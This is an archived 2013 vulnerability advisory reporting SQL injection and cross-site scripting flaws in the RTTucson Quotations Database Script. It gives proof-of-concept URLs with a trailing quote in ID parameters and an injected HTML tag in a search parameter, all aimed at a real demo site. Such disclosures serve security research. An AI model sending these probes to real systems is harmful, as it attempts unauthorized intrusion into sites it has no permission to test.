RTTucson Quotations Database Script XSS / SQL Injection

RTTucson Quotations Database Script XSS / SQL Injection: Posted Feb 19, 2013; Authored by 3spi0n; RTTucson Quotations Database Script suffers from remote SQL injection and cross site scripting vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | e5827e24c69396c14e4480fd2c50f3fe2ce11d0b285b3482dd4d59c0272dcc18; Download | Favorite | View

RTTucson Quotations Database Script XSS / SQL Injection

##################################################################################
       __            _                      _            ____            
      / /___ _____  (_)_____________ ______(_)__  _____ / __ \_________ _
 __  / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/
/ /_/ / /_/ / / / / (__  |__  ) /_/ / /  / /  __(__  )/ /_/ / /  / /_/ / 
\____/\__,_/_/ /_/_/____/____/\__,_/_/  /_/\___/____(_)____/_/   \__, /  
                                                                /____/   
##################################################################################                                
RTTucson Quotations Database Script, Multiple Vulnerabilities
Software Page: http://www.rttucson.com/index.html
Script Demo: http://www.rttucson.com/quotations/default.php

Author(Pentester): 3spi0n
On Social: Twitter.Com/eyyamgudeer
Greetz: Grayhatz Inc. and Janissaries Platform.
##################################################################################

[~] MySQL Injection on Demo Site 

[+] (author.php, ID Param)
>>> http://www.rttucson.com/quotations/author.php?ID=5' (MySQLi Found)

[+] (category_quotes.php, ID Param)
>>> http://www.rttucson.com/quotations/category_quotes.php?ID=9' (MySQLi Found)

[~] XSS on Demo Site

>> (quote_search.php, keywords Param)
>>> http://www.rttucson.com/quotations/quote_search.php?keywords=<h1>Xssed-3spi0n</h1>

Top Authors In Last 30 Days

Red Hat 242 files
Ubuntu 52 files
Debian 22 files
LiquidWorm 15 files
Apple 9 files
Gentoo 8 files
Google Security Research 3 files
Alter Prime 3 files
Pierre Kim 2 files
Jann Horn 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,166)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,960)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,344)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,989)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other

RTTucson Quotations Database Script XSS / SQL Injection

RTTucson Quotations Database Script XSS / SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

RTTucson Quotations Database Script XSS / SQL Injection

Share This

RTTucson Quotations Database Script XSS / SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems